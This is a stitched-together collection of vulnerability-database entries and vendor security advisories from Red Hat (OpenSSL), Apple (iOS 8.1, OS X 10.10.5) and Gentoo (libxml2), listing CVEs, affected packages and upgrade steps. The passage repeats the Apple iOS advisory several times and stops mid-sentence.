openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X
ENFobdxQdJ+gVAiRe8Qf54A=
=wyAg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201410-1084 | CVE-2014-4450 | Apple iOS Keyboard subsystem QuickType Vulnerability of obtaining authentication information in a function |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
The QuickType feature in the Keyboards subsystem in Apple iOS before 8.1 collects typing-prediction data from fields with an off autocomplete attribute, which makes it easier for attackers to discover credentials by reading credential values within unintended DOM input elements. Apple iOS is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-20-1 iOS 8.1
iOS 8.1 is now available and addresses the following:
Bluetooth
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious Bluetooth input device may bypass pairing
Description: Unencrypted connections were permitted from Human
Interface Device-class Bluetooth Low Energy accessories. If an iOS
device had paired with such an accessory, an attacker could spoof the
legitimate accessory to establish a connection. The issue was
addressed by denying unencrypted HID connections.
CVE-ID
CVE-2014-4428 : Mike Ryan of iSEC Partners
House Arrest
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Files transferred to the device may be written with
insufficient cryptographic protection
Description: Files could be transferred to an app's Documents
directory and encrypted with a key protected only by the hardware
UID. This issue was addressed by encrypting the transferred files
with a key protected by the hardware UID and the user's passcode.
CVE-ID
CVE-2014-4448 : Jonathan Zdziarski and Kevin DeLong
iCloud Data Access
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker in a privileged network position may force
iCloud data access clients to leak sensitive information
Description: A TLS certificate validation vulnerability existed in
iCloud data access clients. This issue was addressed by improved
certificate validation.
CVE-ID
CVE-2014-4449 : Carl Mehner of USAA
Keyboards
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: QuickType could learn users' credentials
Description: QuickType could learn users' credentials when switching
between elements. This issue was addressed by QuickType not learning
from fields where autocomplete is disabled and reapplying the
criteria when switching between DOM input elements in legacy WebKit.
CVE-ID
CVE-2014-4450
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
attempts. This issue was addressed by disabling CBC cipher suites
when TLS connection attempts fail.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJURUHQAAoJEBcWfLTuOo7tJMoP/2RPUJpecEmfPnrJHesyWE07
eGVLvu+Qo/VQN2X/aJI4ZxXiZzzEhbo9+HOEmE9hfBW+GwJ+tumOqJ/S0+8X6/BT
955fHTKT8zPHa1OvW2H+CEdeYtxIVTCb14ePmZMfykiyhvvk5HeODKPrj2fO7yL/
Bb9vggEkgZvssrXNQ3SXWLbzTobivaOjGNPXgELUFfCjjZH7Sdf9l8/r+NGR4c4w
YFeDFqfPq9U7ebBt14oH5a+t3ha5uV0Zt1aKFtRkFdJlIwHFMbb7QSUQY1W24Kvt
MKqpWQi1fR2x1k6p5ss6o8S/EeL5Vz6KsPnraWTRayC8w5r6IhVeOLbAEoaI0yON
YoyY9LkFOwx68BZr8q7MyFdN+5iHrlYFG9bfSzIeZ1NmK4cfMgaG+jckoh/GtNjm
voDOHL7qEjDgpAoYZ7XejVKvd5v7xXV8JcnDtmlg+rCh1eH/vyoYX4+PFUW3AiIo
IkgUm0JvaZrOdXP1W2vIqFDHaxGoUMj4Ius+No7X+e4+uDACofBYP8btEdBf2mEW
NBqc2jLZRaXbCpaHK1TCfeqSQLh32pUVWsgsK9ad4uH79tMke2EzyYkwztiksxT3
f4s8MGv2PdYnLjfWc4C5WN8ZbgdILVncTdNUItYvVya1nyuSXkCK6thWS35YEvDp
ViMxSLY5YjSJvhzCf+hk
=5AaA
-----END PGP SIGNATURE-----
| VAR-201410-1083 | CVE-2014-4449 | Apple iOS of iCloud Data Access Vulnerable to server impersonation |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
iCloud Data Access in Apple iOS before 8.1 does not verify X.509 certificates from TLS servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. iCloud Data Access is one of the iCloud (used to provide cloud storage and cloud computing services) data access services. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-20-1 iOS 8.1
iOS 8.1 is now available and addresses the following:
Bluetooth
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious Bluetooth input device may bypass pairing
Description: Unencrypted connections were permitted from Human
Interface Device-class Bluetooth Low Energy accessories. If an iOS
device had paired with such an accessory, an attacker could spoof the
legitimate accessory to establish a connection. The issue was
addressed by denying unencrypted HID connections.
CVE-ID
CVE-2014-4428 : Mike Ryan of iSEC Partners
House Arrest
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Files transferred to the device may be written with
insufficient cryptographic protection
Description: Files could be transferred to an app's Documents
directory and encrypted with a key protected only by the hardware
UID. This issue was addressed by encrypting the transferred files
with a key protected by the hardware UID and the user's passcode.
CVE-ID
CVE-2014-4448 : Jonathan Zdziarski and Kevin DeLong
iCloud Data Access
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker in a privileged network position may force
iCloud data access clients to leak sensitive information
Description: A TLS certificate validation vulnerability existed in
iCloud data access clients. This issue was addressed by improved
certificate validation.
CVE-ID
CVE-2014-4449 : Carl Mehner of USAA
Keyboards
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: QuickType could learn users' credentials
Description: QuickType could learn users' credentials when switching
between elements. This issue was addressed by QuickType not learning
from fields where autocomplete is disabled and reapplying the
criteria when switching between DOM input elements in legacy WebKit.
CVE-ID
CVE-2014-4450
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
attempts. This issue was addressed by disabling CBC cipher suites
when TLS connection attempts fail.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJURUHQAAoJEBcWfLTuOo7tJMoP/2RPUJpecEmfPnrJHesyWE07
eGVLvu+Qo/VQN2X/aJI4ZxXiZzzEhbo9+HOEmE9hfBW+GwJ+tumOqJ/S0+8X6/BT
955fHTKT8zPHa1OvW2H+CEdeYtxIVTCb14ePmZMfykiyhvvk5HeODKPrj2fO7yL/
Bb9vggEkgZvssrXNQ3SXWLbzTobivaOjGNPXgELUFfCjjZH7Sdf9l8/r+NGR4c4w
YFeDFqfPq9U7ebBt14oH5a+t3ha5uV0Zt1aKFtRkFdJlIwHFMbb7QSUQY1W24Kvt
MKqpWQi1fR2x1k6p5ss6o8S/EeL5Vz6KsPnraWTRayC8w5r6IhVeOLbAEoaI0yON
YoyY9LkFOwx68BZr8q7MyFdN+5iHrlYFG9bfSzIeZ1NmK4cfMgaG+jckoh/GtNjm
voDOHL7qEjDgpAoYZ7XejVKvd5v7xXV8JcnDtmlg+rCh1eH/vyoYX4+PFUW3AiIo
IkgUm0JvaZrOdXP1W2vIqFDHaxGoUMj4Ius+No7X+e4+uDACofBYP8btEdBf2mEW
NBqc2jLZRaXbCpaHK1TCfeqSQLh32pUVWsgsK9ad4uH79tMke2EzyYkwztiksxT3
f4s8MGv2PdYnLjfWc4C5WN8ZbgdILVncTdNUItYvVya1nyuSXkCK6thWS35YEvDp
ViMxSLY5YjSJvhzCf+hk
=5AaA
-----END PGP SIGNATURE-----
| VAR-201410-1082 | CVE-2014-4448 | Apple iOS of House Arrest Vulnerability in which important information can be obtained from the document directory |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
House Arrest in Apple iOS before 8.1 relies on the hardware UID for its encryption key, which makes it easier for physically proximate attackers to obtain sensitive information from a Documents directory by obtaining this UID.
Successfully exploiting this issue may allow attackers to view encrypted data and obtain sensitive information. This may lead to other attacks. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. House Arrest is one of the services used for calling iTunes to send and receive files between iOS devices and Apps. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-20-1 iOS 8.1
iOS 8.1 is now available and addresses the following:
Bluetooth
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious Bluetooth input device may bypass pairing
Description: Unencrypted connections were permitted from Human
Interface Device-class Bluetooth Low Energy accessories. If an iOS
device had paired with such an accessory, an attacker could spoof the
legitimate accessory to establish a connection. The issue was
addressed by denying unencrypted HID connections.
CVE-ID
CVE-2014-4428 : Mike Ryan of iSEC Partners
House Arrest
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Files transferred to the device may be written with
insufficient cryptographic protection
Description: Files could be transferred to an app's Documents
directory and encrypted with a key protected only by the hardware
UID. This issue was addressed by encrypting the transferred files
with a key protected by the hardware UID and the user's passcode.
CVE-ID
CVE-2014-4448 : Jonathan Zdziarski and Kevin DeLong
iCloud Data Access
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker in a privileged network position may force
iCloud data access clients to leak sensitive information
Description: A TLS certificate validation vulnerability existed in
iCloud data access clients. This issue was addressed by improved
certificate validation.
CVE-ID
CVE-2014-4449 : Carl Mehner of USAA
Keyboards
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: QuickType could learn users' credentials
Description: QuickType could learn users' credentials when switching
between elements. This issue was addressed by QuickType not learning
from fields where autocomplete is disabled and reapplying the
criteria when switching between DOM input elements in legacy WebKit.
CVE-ID
CVE-2014-4450
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
attempts. This issue was addressed by disabling CBC cipher suites
when TLS connection attempts fail.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJURUHQAAoJEBcWfLTuOo7tJMoP/2RPUJpecEmfPnrJHesyWE07
eGVLvu+Qo/VQN2X/aJI4ZxXiZzzEhbo9+HOEmE9hfBW+GwJ+tumOqJ/S0+8X6/BT
955fHTKT8zPHa1OvW2H+CEdeYtxIVTCb14ePmZMfykiyhvvk5HeODKPrj2fO7yL/
Bb9vggEkgZvssrXNQ3SXWLbzTobivaOjGNPXgELUFfCjjZH7Sdf9l8/r+NGR4c4w
YFeDFqfPq9U7ebBt14oH5a+t3ha5uV0Zt1aKFtRkFdJlIwHFMbb7QSUQY1W24Kvt
MKqpWQi1fR2x1k6p5ss6o8S/EeL5Vz6KsPnraWTRayC8w5r6IhVeOLbAEoaI0yON
YoyY9LkFOwx68BZr8q7MyFdN+5iHrlYFG9bfSzIeZ1NmK4cfMgaG+jckoh/GtNjm
voDOHL7qEjDgpAoYZ7XejVKvd5v7xXV8JcnDtmlg+rCh1eH/vyoYX4+PFUW3AiIo
IkgUm0JvaZrOdXP1W2vIqFDHaxGoUMj4Ius+No7X+e4+uDACofBYP8btEdBf2mEW
NBqc2jLZRaXbCpaHK1TCfeqSQLh32pUVWsgsK9ad4uH79tMke2EzyYkwztiksxT3
f4s8MGv2PdYnLjfWc4C5WN8ZbgdILVncTdNUItYvVya1nyuSXkCK6thWS35YEvDp
ViMxSLY5YjSJvhzCf+hk
=5AaA
-----END PGP SIGNATURE-----
| VAR-201411-0450 | CVE-2014-3660 | libxml2 of parser.c Service operation interruption in (DoS) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
parser.c in libxml2 before 2.9.2 does not properly prevent entity expansion even when entity substitution has been disabled, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted XML document containing a large number of nested entity references, a variant of the "billion laughs" attack. (CPU consumption of resources ) This vulnerability is Billion Laughs This vulnerability has mutated from the attack. : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference ('XXE') (XML Improper restriction of external entity references ) has been identified. XML Denial of service via documents (CPU consumption of resources ) It may be in a state. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc.
Background
==========
libxml2 is the XML C parser and toolkit developed for the Gnome
project.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.2"
Packages which depend on this library may need to be recompiled. Tools
such as revdep-rebuild may assist in identifying these packages.
References
==========
[ 1 ] CVE-2014-3660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3660
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update
2015-006
OS X Yosemite v10.10.5 and Security Update 2015-006 is now available
and addresses the following:
apache
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in Apache versions
prior to 2.4.16. These were addressed by updating Apache to version
2.4.16.
CVE-ID
CVE-2014-3581
CVE-2014-3583
CVE-2014-8109
CVE-2015-0228
CVE-2015-0253
CVE-2015-3183
CVE-2015-3185
apache_mod_php
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most
serious of which may lead to arbitrary code execution.
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.20. These were addressed by updating Apache to version 5.5.27.
CVE-ID
CVE-2015-2783
CVE-2015-2787
CVE-2015-3307
CVE-2015-3329
CVE-2015-3330
CVE-2015-4021
CVE-2015-4022
CVE-2015-4024
CVE-2015-4025
CVE-2015-4026
CVE-2015-4147
CVE-2015-4148
Apple ID OD Plug-in
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able change the password of a
local user
Description: In some circumstances, a state management issue existed
